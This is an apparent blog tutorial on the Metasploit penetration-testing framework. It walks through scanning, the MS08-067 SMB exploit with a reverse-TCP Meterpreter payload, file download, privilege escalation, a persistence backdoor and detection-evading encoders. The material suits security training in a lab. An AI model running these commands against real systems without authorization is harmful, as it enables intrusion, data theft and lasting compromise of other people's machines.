Metasploit Tutorial

byITZ PASINDU -

Comprehensive Metasploit Tutorial

Introduction

Metasploit is a powerful and widely-used penetration testing framework that provides security researchers and professionals with the tools necessary to test system vulnerabilities, develop and execute exploit code, and perform various tasks related to cybersecurity. This comprehensive guide will walk you through the basics of Metasploit, its installation, usage, and advanced features.

Prerequisites

  • A system with Kali Linux installed (Metasploit comes pre-installed on Kali Linux).
  • Basic understanding of network protocols, operating systems, and cybersecurity concepts.
  • A target machine for testing purposes (e.g., a vulnerable virtual machine like Metasploitable).

Installing Metasploit

Metasploit is pre-installed on Kali Linux. If you are using another Linux distribution or want to update Metasploit, follow these steps:

  1. Update and Upgrade Your System: 
    sudo apt-get update && sudo apt-get upgrade
  2. Install Metasploit Framework: 
    curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfupdate | sudo bash

Starting Metasploit

  1. Open Terminal and start Metasploit: 
    sudo msfconsole
  2. Metasploit Console:

    Upon starting, you will see the Metasploit banner and the msf> prompt, indicating that Metasploit is ready for use.

Basic Commands

  • Search: Find exploits, payloads, or auxiliary modules. 
    search <term>
  • Use: Load a specific module. 
    use <module_path>
  • Show Options: Display available options for a module. 
    show options
  • Set: Set options for the module. 
    set <option_name> <value>
  • Run/Exploit: Execute the loaded module. 
    run
    or 
    exploit

Metasploit Modules

Metasploit consists of several types of modules:

Exploits

Code that takes advantage of a vulnerability in a system.

use exploit/<module_path>

Payloads

Code that runs on the target system after exploitation.

set payload <payload_name>

Auxiliary

Modules used for scanning, fuzzing, and other tasks that don't require exploitation.

use auxiliary/<module_path>

Encoders

Encode payloads to evade detection.

use encoder/<encoder_name>

Nops

No-operation instructions used to pad payloads.

use nop/<nop_name>

Conducting a Penetration Test with Metasploit

Step 1: Information Gathering

Use auxiliary modules to gather information about the target.

Port Scanning with Nmap

nmap -sS -A <target_ip>

Service Enumeration

use auxiliary/scanner/portscan/tcp
set RHOSTS <target_ip>
set THREADS 10
run

Step 2: Vulnerability Scanning

Identify vulnerabilities on the target system.

Using Vulnerability Scanners

use auxiliary/scanner/http/nikto
set RHOSTS <target_ip>
run

Step 3: Exploitation

Use exploits to gain access to the target system.

Search for Exploits

search exploit windows smb

Select and Configure an Exploit

use exploit/windows/smb/ms08_067_netapi
set RHOST <target_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your_ip>
run

Step 4: Post-Exploitation

Perform tasks after gaining access to the target system.

Meterpreter Session

Upon successful exploitation, Metasploit will provide a Meterpreter session.

meterpreter>

Gather Information

Collect information from the target system.

meterpreter> sysinfo
meterpreter> getuid
meterpreter> ipconfig

File System Navigation

Browse the target file system.

meterpreter> ls
meterpreter> cd <directory>
meterpreter> download <file>

Privilege Escalation

Attempt to elevate privileges on the target system.

meterpreter> getsystem

Maintaining Access

Establish a persistent backdoor on the target system.

run persistence -U -i 5 -p 4444 -r <your_ip>

Step 5: Reporting

Document your findings and create a report.

Generate Reports

Use Metasploit Pro (commercial version) to generate reports.

load report

Manual Documentation

Note down vulnerabilities, exploits used, and outcomes.

Advanced Features

Armitage

A graphical front-end for Metasploit, Armitage, simplifies the penetration testing process.

Install Armitage

sudo apt-get install armitage

Start Armitage

sudo armitage

Using Armitage

Provides a visual representation of targets and available exploits.

Metasploit Community and Pro

Metasploit Community and Pro editions offer additional features like automated exploits, advanced reporting, and team collaboration tools. Visit Rapid7's website for more information.

Conclusion

Metasploit is a versatile and powerful tool for penetration testers, security researchers, and ethical hackers. By understanding its modules, commands, and features, you can conduct thorough penetration tests and improve the security posture of your targets. Always ensure you have proper authorization before performing any penetration testing activities.

For further learning and resources, consider exploring:

Feel free to ask if you need more detailed information on any specific part of this guide!

You might like

View all
Previous Post Next Post
Share to other apps
Copy Post link